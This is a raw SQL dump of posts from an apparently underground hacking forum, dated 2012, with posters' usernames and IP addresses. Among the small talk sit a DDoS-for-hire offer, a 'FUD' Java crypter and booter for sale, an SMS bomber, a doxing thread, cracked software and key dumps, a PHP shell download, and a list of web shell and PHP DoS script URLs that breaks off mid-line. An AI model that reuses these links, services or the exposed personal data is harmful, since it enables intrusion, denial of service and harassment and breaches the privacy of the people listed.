https://dl.dropbox.com/u/62710280/YouBooster%20PRO%20EDITION.rar [/lock]', '165.155.208.77', '-1516515251', '1', '0', '1', '1352427291', '1', 'b523107e1ccda5ac89cd80ea61191e0c', '0', '1352427291'); INSERT INTO mybb_posts VALUES('7251', '1225', '7249', '25', 'RE: [Serials] Malwarebytes Full keys Dump', '0', '82', 'iTzIpod', '1352406855', 'Thanks for the share! Although I won\'t be needing this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25ff234874fe51d5707b81c3184fedb9', '0', '0'); INSERT INTO mybb_posts VALUES('7252', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1352408158', 'It would be sick if you could get him re-doxed.', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', '48045018ea602d7355d37ad8dd777f66', '0', '0'); INSERT INTO mybb_posts VALUES('7253', '1207', '7133', '35', 'RE: Rate these logos', '0', '2', 'Apathy', '1352408225', 'Is this by any chance for skill?', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', 'c96d452e8adac73a31e4654cb517583f', '0', '0'); INSERT INTO mybb_posts VALUES('7254', '1227', '0', '4', 'Whaddup! <3', '0', '333', 'illest', '1352413588', '[b][align=center]Hello! I am illest! You may know me from other forums!\r\nI will post a list of usernames I go by down at the bottom. I a, just look for new forums and I ran into this one! Hopefully I will enjoy my time here. If you want to chat or anything like that, feel free to send me a PM and I will provide you my Skype or Aim. I talk about anything, if you have problems or something I will be more than happy to talk to you about them. Thanks for reading this, I appreciate it a lot! See you around! Peace! <3\r\n\r\nOther sites you may know me on. \r\nIf you know me, send me a PM!\r\n\r\n[spoiler]SE.net - Jdm\r\nTTG - Jdm\r\nLF - illest\r\nVHF - illest\r\nEliteVIP - Love\r\nHF - STANCEWORKS\r\n[/spoiler]\r\n[/align][/b]', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', '8c15b9c9effaf5a779865a7ffd4ada1c', '0', '0'); INSERT INTO mybb_posts VALUES('7255', '1207', '7133', '35', 'RE: Rate these logos', '0', '333', 'illest', '1352413672', 'I love the first one! That is my favorite out of all of them!\nI rate it a 8.6/10!', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', '91ca718c39f582c942f73539eb9a9d79', '0', '0'); INSERT INTO mybb_posts VALUES('7256', '1228', '0', '35', 'New banner!', '0', '333', 'illest', '1352414056', 'Just made this for you guys! Hope you like it(:\r\n\r\nOld Banner:\r\n[spoiler][img]http://l33thacking.net/images/CoderGreen/logo.png[/img][/spoiler]\r\n\r\n\r\nNew Banner:\r\n[spoiler][img]http://i.imgur.com/qkVfJ.png[/img][/spoiler]\r\n\r\n\r\nPreview on the site:\r\n[spoiler][url=http://icap.me/i/cC1CZRJRST.png]Preview of Banner in use![/url][/spoiler]', '65.102.190.80', '1097252432', '0', '0', '333', '1352414108', '1', '7f570edb8899d09edb20b9930fc2d466', '0', '1352414108'); INSERT INTO mybb_posts VALUES('7257', '1228', '7256', '35', 'RE: New banner!', '0', '82', 'iTzIpod', '1352418658', 'Looks very nice! :)\nNice design and thanks for the contribution to our forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d6728772724f4790dba98dbf541c6a0', '0', '0'); INSERT INTO mybb_posts VALUES('7258', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '82', 'iTzIpod', '1352418786', 'You should not post your HF name as Omniscient might ban you. :p\nI don\'t know but it\'s a maybe.\nWelcome to the forum dude! :D\nEnjoy your stay. Hope you be active and HQ. \nAdd me on Skype!\nSkype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f7935bfb1254a3b5b336a2a2a16e8e7f', '0', '0'); INSERT INTO mybb_posts VALUES('7259', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352418842', '@Apathy, what are you talking about? No they were in need of a new banner so I volunteered and offered my time to make a banner for them.\nThanks illest for your feedback! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2eb52c7aabdb9f53f2b9174effe0bdad', '0', '0'); INSERT INTO mybb_posts VALUES('7260', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '262', 'RAND0M1ZER', '1352422939', 'Links are down! Please fix them, lol\n[hr]\nAw links are down, can you fix them?', '108.162.138.186', '1822591674', '0', '0', '262', '1352422976', '1', '2fb8cd97fad8ea6752349bd3bbbc08f6', '0', '0'); INSERT INTO mybb_posts VALUES('7261', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '61', 'NXK', '1352426489', 'Welcome, I hope you find what you\'re looking for here. Good luck and stay HQ :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '55b5ea01c3404d522974a747065a4dab', '0', '0'); INSERT INTO mybb_posts VALUES('7262', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '1', 't3h jok3r', '1352427111', 'Leechers gonna leech. I wish the OP used the lock mycode anyway closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '112011775ce92f663e22944eedac6e49', '0', '0'); INSERT INTO mybb_posts VALUES('7263', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '1', 't3h jok3r', '1352427255', 'Welcome to L33T Hacking illest.\n\nHow did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0480103b1f6fd2d6bcf11cf118e860cc', '0', '0'); INSERT INTO mybb_posts VALUES('7264', '1078', '7252', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1352427664', '[quote=\'Apathy\' pid=\'7252\' dateline=\'1352408158\']\r\nIt would be sick if you could get him re-doxed.\r\n[/quote]\r\n\r\nWas that meant for me or expose?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b76f3e3748bcad150cee4ea105dbfa33', '0', '0'); INSERT INTO mybb_posts VALUES('7265', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352427997', 'I finally reached 1,000 posts and L33T Hacking now has 7,100 posts. Our monetizing section also reached 200 posts.', '72.231.24.165', '1223104677', '1', '0', '1', '1352428042', '1', '3e3bdbd7215778c882d5310be6eee9dc', '0', '1352428042'); INSERT INTO mybb_posts VALUES('7266', '1227', '7263', '4', 'RE: Whaddup! <3', '0', '333', 'illest', '1352430923', '[quote=\'t3h jok3r\' pid=\'7263\' dateline=\'1352427255\']\r\nWelcome to L33T Hacking illest.\r\n\r\nHow did you find us?\r\n[/quote]\r\n\r\nI was actually voting on a website for a different site (don\'t remember what website) but then I saw this forum, and I was like hmm that looks interesting! Thanks for all the welcomes guys!', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', 'b765d480be9006861ca71cf4a2ab253b', '0', '0'); INSERT INTO mybb_posts VALUES('7267', '1228', '7257', '35', 'RE: New banner!', '0', '333', 'illest', '1352431003', '[quote=\'iTzIpod\' pid=\'7257\' dateline=\'1352418658\']\r\nLooks very nice! :)\r\nNice design and thanks for the contribution to our forum.\r\n[/quote]\r\n\r\nYou\'re very welcome kind sir! Hopefully it will be used! That would make me pretty happy(:', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', 'dff11f1df720a9d2a8dcd02ac511d0f4', '0', '0'); INSERT INTO mybb_posts VALUES('7310', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '1', 't3h jok3r', '1352519900', 'Someone once hacked my FB through phishing when I was like 12 years old.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0747ab218cc180c552340143cff4239c', '0', '0'); INSERT INTO mybb_posts VALUES('7311', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '5', 'Timmy', '1352520916', 'Someone hacked my email through phishing and deleted all my emails.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '04176177f35a13c201b61e4f0cc64a63', '0', '0'); INSERT INTO mybb_posts VALUES('7312', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1352520969', 'Lol congratz jok3r on 1000 posts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'db55788300f4bb6a0ed621ff023741dd', '0', '0'); INSERT INTO mybb_posts VALUES('7269', '1227', '7266', '4', 'RE: Whaddup! <3', '0', '1', 't3h jok3r', '1352431093', '[quote=\'illest\' pid=\'7266\' dateline=\'1352430923\']\r\n[quote=\'t3h jok3r\' pid=\'7263\' dateline=\'1352427255\']\r\nWelcome to L33T Hacking illest.\r\n\r\nHow did you find us?\r\n[/quote]\r\n\r\nI was actually voting on a website for a different site (don\'t remember what website) but then I saw this forum, and I was like hmm that looks interesting! Thanks for all the welcomes guys!\r\n[/quote]\r\n\r\nOh that\'s cool. I know what site you found on us now, thanks for joining and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '382935b24b0291247a91a41bdb4ac4c3', '0', '0'); INSERT INTO mybb_posts VALUES('7270', '1229', '0', '49', 'Just a quick suggestion.', '0', '333', 'illest', '1352431355', '[align=center][b]I personally think the shadow should be removed in some places, it would look much cleaner in my opinion. I will post below where the shadow looks bad.\r\n\r\n[img]http://icap.me/i/2KN5xhrN18.png[/img][/b][/align]', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', 'cd9ed84808e362be9d00644cf562fbd8', '0', '0'); INSERT INTO mybb_posts VALUES('7271', '1078', '7264', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1352433223', '[quote=\'t3h jok3r\' pid=\'7264\' dateline=\'1352427664\']\r\n[quote=\'Apathy\' pid=\'7252\' dateline=\'1352408158\']\r\nIt would be sick if you could get him re-doxed.\r\n[/quote]\r\n\r\nWas that meant for me or expose?\r\n[/quote]\r\n\r\nExposed. But you could do it too. :P', '173.206.129.140', '-1378975348', '0', '0', '0', '0', '1', '51ac92f38e6042b13fd46df7ec1abd9c', '0', '0'); INSERT INTO mybb_posts VALUES('7272', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '54', 'Sin Cara', '1352436330', 'Thanks for the share.Going to check it right now.', '119.154.7.175', '2006583215', '1', '0', '0', '0', '1', 'd8d6c7a88cb5e8617fe59850f4a7db73', '0', '0'); INSERT INTO mybb_posts VALUES('7273', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '228', 'VirtualLegend', '1352449592', 'Sup illest Welcome to LH,\n\nHave a nice stay here', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', '1a07a471b7a0ceadf0d572014870796e', '0', '0'); INSERT INTO mybb_posts VALUES('7274', '1228', '7256', '35', 'RE: New banner!', '0', '228', 'VirtualLegend', '1352449671', 'It looks very Good\n\nGood Job', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', 'c299b8e87575ba30c3b4751ce2bcf1a2', '0', '0'); INSERT INTO mybb_posts VALUES('7275', '1228', '7256', '35', 'RE: New banner!', '0', '257', 'XxTREYZxX', '1352450451', 'Its a great design.\nGreat work.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '07e7362e829a78793217c390c7dcd6b5', '0', '0'); INSERT INTO mybb_posts VALUES('7276', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '257', 'XxTREYZxX', '1352450845', 'Have a great stay please be active.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'ebf25bc048580718da459c5d07302dd1', '0', '0'); INSERT INTO mybb_posts VALUES('7277', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '62', 'R?????zo?', '1352451205', 'Thanks for this, I will have a look :)', '95.69.35.19', '1598366483', '1', '0', '0', '0', '1', '06df3443608c0769265b57de6c6aefea', '0', '0'); INSERT INTO mybb_posts VALUES('7278', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '257', 'XxTREYZxX', '1352451314', 'Thanks so much for the share.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '54bfd53270be6c321ec33cc769528fd4', '0', '0'); INSERT INTO mybb_posts VALUES('7279', '1230', '0', '49', 'great suggestion', '19', '257', 'XxTREYZxX', '1352451665', 'Hey LH, my suggestion is that we should do a point system and with point system. Make a point shop where you can buy Elite upgrade Dubstep songs donwnload, Etc.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'b8bb75d5db1078960e32adba98c8a2ea', '0', '0'); INSERT INTO mybb_posts VALUES('7280', '1231', '0', '15', '[link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '335', 'loser386', '1352452340', '[img]http://fortunewallstreet.files.wordpress.com/2011/05/skype-450x450.png[/img]\r\nSkype SmS Bomber Allow you to do worldwide sms bombing with the fast and powerful server of skype\r\n\r\nYou just Need A Skype Account for this and i recommended to make a fake one and then just follow the TuT\r\n\r\nHow It,s Work\r\n\r\n[video=youtube]www.youtube.com/watch?v=5HJPwQCUw6s[/video]\r\n\r\nHow To Get It :\r\n[spoiler][url=http://dl.dropbox.com/u/51740637/Jays%20Booter%20v5.8.2/sms%20bomber.html]Enjoy[/url][/spoiler]\r\n\r\nNote:\r\nyour skype account gets banned when using this. So do not use your main skype account. make a fake one :)', '110.36.19.190', '1847858110', '0', '0', '0', '0', '1', '5f4eb3c36880880ea2026f66a813d1b9', '0', '0'); INSERT INTO mybb_posts VALUES('7281', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '82', 'iTzIpod', '1352464477', 'To send SMS, don\'t you need Skype Credit??', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '22ddd5e7a7fd49a890afcb54290d3fa2', '0', '0'); INSERT INTO mybb_posts VALUES('7282', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352464544', 'Congratulations t3h jok3r.\nFinally 1000 posts. ._. I reached that milestone like 2-4 weeks ago. Come on. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88f689757083793f92fff3632b987847', '0', '0'); INSERT INTO mybb_posts VALUES('7283', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '258', 'PiXEL^OG', '1352471127', 'Looks fake to me.. DON\'T DOWNLOAD YOU GUYS KNOW THIS LOOKS BAD', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd406eef43a2b8099e53a173d363a7b6a', '0', '0'); INSERT INTO mybb_posts VALUES('7284', '1230', '7279', '49', 'RE: great suggestion', '0', '53', 'sirchamp', '1352473035', 'Not a bad idea even though its used by many other forums...\nI think we should do a point system.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'fbf0a56963031959813acf72ac72a2e4', '0', '0'); INSERT INTO mybb_posts VALUES('7285', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '53', 'sirchamp', '1352474295', 'Ill try it. Thanks for share.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'b96907b3b7bf0223f9c49695899d7ec0', '0', '0'); INSERT INTO mybb_posts VALUES('7286', '1218', '7179', '17', 'RE: Camdecoy bitch available here', '0', '323', 'moruzaks', '1352476992', 'i would love to have the vid men....', '216.119.145.99', '-663252637', '0', '0', '0', '0', '1', '6d9888396d599014e823a7d5a05b2f17', '0', '0'); INSERT INTO mybb_posts VALUES('7287', '1230', '7279', '49', 'RE: great suggestion', '0', '61', 'NXK', '1352479091', 'Elite upgrades pay for our hosting, So that wont be happening. But I like the song downloads and things like that.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'c7381ea0f54bba303d31658b5a50c3fd', '0', '0'); INSERT INTO mybb_posts VALUES('7288', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '61', 'NXK', '1352479144', 'Seems like a good collection of tutorials. Nice share :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '52676119aa41fc2131958fec7a1aa958', '0', '0'); INSERT INTO mybb_posts VALUES('7289', '1232', '0', '9', 'Adfoc.us Trick', '0', '53', 'sirchamp', '1352486031', 'Im realising the trick to cheat adfoc.us \r\nBy now everyone knows it... and adfoc.us will probobally not payout.\r\n\r\n[lock] http://www.mediafire.com/?xmcjmzw71map00x[/lock]\r\n\r\n\r\nHope you guys like it..', '188.155.56.90', '-1130678182', '1', '0', '61', '1352493803', '1', '1ed205f76bf906d63f9ac4a751fc3d3d', '0', '1352493803'); INSERT INTO mybb_posts VALUES('7290', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '67', 'HoverCatz', '1352486205', 'Thanks for this :)', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '405de458543efb3be1e53e82b350ffb9', '0', '0'); INSERT INTO mybb_posts VALUES('7291', '1228', '7256', '35', 'RE: New banner!', '0', '67', 'HoverCatz', '1352486494', 'Cool, but i think i will stick to the current one. :)', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '9b5d0cf269e229e2628000093f23e223', '0', '0'); INSERT INTO mybb_posts VALUES('7294', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '82', 'iTzIpod', '1352495703', 'Thanks for sharing. I\'m wondering what it is.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdf53d1b73d163cdf403f4a8fd4cb459', '0', '0'); INSERT INTO mybb_posts VALUES('7293', '1233', '0', '15', '[SALES] Sparky Java 2.0 | FUD Jar | 15 Domains | Addon:Skype Resolver| Booter', '0', '61', 'NXK', '1352491084', '[align=center]Sparky Java 2.0 | FUD Jar | 15 Domains | Addon:Skype Resolver| Booter 15LR | 20 PP\r\n[img]http://i.imgur.com/IgSbh.png[/img]\r\n[img]http://i.imgur.com/toTEj.png[/img]\r\n20$ Pay pal\r\n15$ LR\r\n[img]http://i.imgur.com/EoSwJ.png[/img]\r\nContact madhacker on site.\r\nhttp://l33thacking.net/user-337.html\r\nOr add him on skype \r\nsuperhero619 <- With the note \"Sparky Java\"\r\n\r\nSome pictures \r\nhttp://imgur.com/a/6xXsG#0\r\n\r\nI use this and can Say it\'s awesome :)!\r\n[/align]', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '88a983e19279e9b4f781ebd9151a4789', '0', '0'); INSERT INTO mybb_posts VALUES('7295', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '82', 'iTzIpod', '1352495864', 'I don\'t trust this user or this thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e339fa0c1b0490aec47a0901d19f3ffa', '0', '0'); INSERT INTO mybb_posts VALUES('7296', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '1', 't3h jok3r', '1352496640', 'Boot means to hit offline.\nWhy do you have the right click disabled?\nDon\'t you need to enter the number of the victim you are sending SMS to?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9eed84c8bd66ac61fae74467ee52e5f5', '0', '0'); INSERT INTO mybb_posts VALUES('7297', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '61', 'NXK', '1352497096', 'Use this program with caution.', '99.252.235.12', '1677519628', '1', '0', '61', '1352497106', '1', '3bf276f94268d294bdf7a204f0a22837', '0', '1352497106'); INSERT INTO mybb_posts VALUES('7298', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '82', 'iTzIpod', '1352500126', 'Why do we have to use it with caution NXK?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '39cc1b5dfdbe18bb24a65691facfe7f3', '0', '0'); INSERT INTO mybb_posts VALUES('7299', '1234', '0', '46', 'Did someone ever hack you through phishing?', '0', '4', 'Triple H', '1352517114', 'Did you ever get hacked by phishing on any site?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '38c84b193f6b1efac3b19c3e9796a55f', '0', '0'); INSERT INTO mybb_posts VALUES('7300', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '4', 'Triple H', '1352517305', 'Can you hit people offline too or just sites?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dc3ffaa0f03c083856053d8003cf7a63', '0', '0'); INSERT INTO mybb_posts VALUES('7301', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '4', 'Triple H', '1352517456', 'Thanks will try this out and does this also work with adf.ly?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9eeeecafe743d86c8014974fe77ebcc8', '0', '0'); INSERT INTO mybb_posts VALUES('7302', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '100', '??zg???g????61', '1352517538', 'I can do both. :) you interested?', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'b3b07ec414d484508570fe08bed14a66', '0', '0'); INSERT INTO mybb_posts VALUES('7303', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '82', 'iTzIpod', '1352517974', 'Get on Skype please Gron <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d8866164a52618ff04776836e3e6973', '0', '0'); INSERT INTO mybb_posts VALUES('7304', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '82', 'iTzIpod', '1352518006', 'I doubt it does Triple H.\n\nSirchamp, why did you share the secret to your service?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6ffac1906ffdc894dc60c263c704d03', '0', '0'); INSERT INTO mybb_posts VALUES('7305', '398', '7302', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '4', 'Triple H', '1352518368', '[quote=\'??zg???g????61\' pid=\'7302\' dateline=\'1352517538\']\r\nI can do both. :) you interested?\r\n[/quote]\r\n\r\nNo just asking just in case i need it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77c8d2a6f638267dfc9a7c29e5371f5d', '0', '0'); INSERT INTO mybb_posts VALUES('7306', '1228', '7256', '35', 'RE: New banner!', '0', '4', 'Triple H', '1352518437', 'Not bad but i say the one now is good.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0227142422f2b71ff5445925fa00ce16', '0', '0'); INSERT INTO mybb_posts VALUES('7307', '1230', '7279', '49', 'RE: great suggestion', '0', '4', 'Triple H', '1352518566', 'Its a nice idea but what would be for sale?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fa8c7ec8625ac587194199f036355068', '0', '0'); INSERT INTO mybb_posts VALUES('7308', '1229', '7270', '49', 'RE: Just a quick suggestion.', '0', '4', 'Triple H', '1352518606', 'I agree with this and maybe make this some like light grey.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3848fd6743d523d9bb4973fdcd19409d', '0', '0'); INSERT INTO mybb_posts VALUES('7309', '1201', '7064', '64', 'RE: Sinister Movie Rip', '0', '4', 'Triple H', '1352519425', 'Thanks i just watched it and its a boring movie.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ce4fa148e3490583d86b2f7d3e25ccf', '0', '0'); INSERT INTO mybb_posts VALUES('7313', '1235', '0', '42', 'Marijuana legalized in two US states', '0', '5', 'Timmy', '1352521201', 'quote]DENVER — For supporters of legalizing marijuana, it was a historic moment, one that drew comparisons to the end of Prohibition: On Tuesday, voters in Colorado and Washington State made it legal to smoke pot recreationally, without any prescription or medical excuse...\r\n\r\nAs soon as the laws are certified, it will be legal under Colorado and Washington law for adults 21 years and older to possess up to an ounce of marijuana. In Colorado, people will be able to grow as many as six plants. In Washington, users will have to buy their marijuana from state-licensed providers...\r\n\r\nThe laws do not allow people to light up in public, and cities and counties will be able to block marijuana retailers, in much the same way that blue laws have restricted alcohol sales for decades. And it remains illegal to drive a motor vehicle while high on the drug... [/quote]\r\n\r\nSource: http://www.nytimes.com/2012/11/08/us/politics/marijuana-laws-eased-in-colorado-and-washington.html\r\n\r\nThought this was pretty big news, it\'s going to be interesting to see how the federal government reacts to this and to see if other states follow Colorado & Washington State in legalization.\r\n\r\nWhat are your thoughts on legalization, are you for it or against it?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '898f5d3fca822ea869716884f9b9544e', '0', '0'); INSERT INTO mybb_posts VALUES('7314', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '5', 'Timmy', '1352521492', 'Thanks a bunch man this worked. I saved myself from a project and a donation today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0630a8fe45df2fb0483191eec02d20af', '0', '0'); INSERT INTO mybb_posts VALUES('7315', '1229', '7270', '49', 'RE: Just a quick suggestion.', '0', '205', 'mothered', '1352521504', 'I support this also.\r\n\r\nIt looks somewhat blurred the way It Is.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5d4a45a187c600bec294a6cd23548198', '0', '0'); INSERT INTO mybb_posts VALUES('7316', '766', '3902', '20', 'RE: [3/14] War - Crypter [ScanTime] by cris', '0', '5', 'Timmy', '1352521603', 'Why do people use adf.ly/adfocus on virus scans? Thanks btw', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '527128d1694570cb4ce768dcd0117d06', '0', '0'); INSERT INTO mybb_posts VALUES('7317', '1236', '0', '3', 'CloudFlare Issues?', '0', '205', 'mothered', '1352521789', 'Greetings everyone,\r\n\r\nMajority of times when either trying to get online here, or between posts, there seems to be a CloudFlare Issue, whereby the site Is offline. Down For Everyone Or Just Me, confirms the same.\r\n\r\nAnyone else experiencing It too?\r\nPS: Need to copy this text, In case It goes offline when I try and post It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'bd97a53612871f9c6503cec3e11d3937', '0', '0'); INSERT INTO mybb_posts VALUES('7318', '1237', '0', '61', 'Suggestion for this section', '0', '5', 'Timmy', '1352521857', 'I think we should also use the lock mycode here because then active people will leech from here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '80c88414d4d74aeb77ba6b6556ade370', '0', '0'); INSERT INTO mybb_posts VALUES('7319', '1235', '7313', '42', 'RE: Marijuana legalized in two US states', '0', '205', 'mothered', '1352521947', 'I certainly didn\'t see this coming anytime soon.\r\n\r\nIt\'ll be Interesting to see, what the outcome of all this will cause.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5b4cf8e8e3d5960935cc61468b907d0b', '0', '0'); INSERT INTO mybb_posts VALUES('7320', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '5', 'Timmy', '1352521965', 'I seem to be having the same issue but only when posting sometimes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '93e708104df719c9c0b2bf6ee78013d9', '0', '0'); INSERT INTO mybb_posts VALUES('7321', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '5', 'Timmy', '1352523105', 'A section for networking discussions such as internet, firewalls etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c06fbc1214d96424e6f27607547da7c6', '0', '0'); INSERT INTO mybb_posts VALUES('7322', '1238', '0', '67', 'Slowlowirs Shell .PHP file', '0', '5', 'Timmy', '1352523436', 'Enjoy!\r\n\r\n[lock]\r\nhttp://www.mediafire.com/?k39f9e61a18bj18\r\n[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd24e1a561a677a1707aa2032552843a4', '0', '0'); INSERT INTO mybb_posts VALUES('7323', '1239', '0', '84', '800 shells', '0', '5', 'Timmy', '1352524746', '800 public shells. Not sure if all work or not but check using shell checker.\r\n\r\n\r\n[lock]\r\n[code]\r\n\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://yogeshmehra1987.110mb.com/index.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://urmybest.110mb.com/phpdos.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://www.team-crowplay.de/\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://www.team-crowplay.de/function.php\r\nhttp://avatarmovieonline.110mb.com/\r\nhttp://aldy.byethost2.com/\r\nhttp://mehdi4604.persiangig.com/vbulltien/ddos.php\r\nhttp://rahmat.tv/mount/php-dos-coded-by-exe.htm\r\nhttp://niyuavalon.webege.com/phpddos/control/\r\nhttp://dinamo.com.nu/php/\r\nhttp://ngoisaoblog.vn/DDOS.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://tinypaste.com/e38333\r\nhttp://virusgamingz.roxorgamers.com/\r\nhttp://www.team-crowplay.de/index.php\r\nhttp://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://www.1100f.com/member/\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/index.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://belsec.skynetblogs.be/post/7896874/next--getting-hacked-to-ddos-another-site-to-\r\nhttp://toutsourtous.webobo.com/html.php?id_menu=3336677\r\nhttp://dos123.uw.hu/index.php\r\nhttp://odrp.eu.nu/index.php?action=BoardMarkAllAs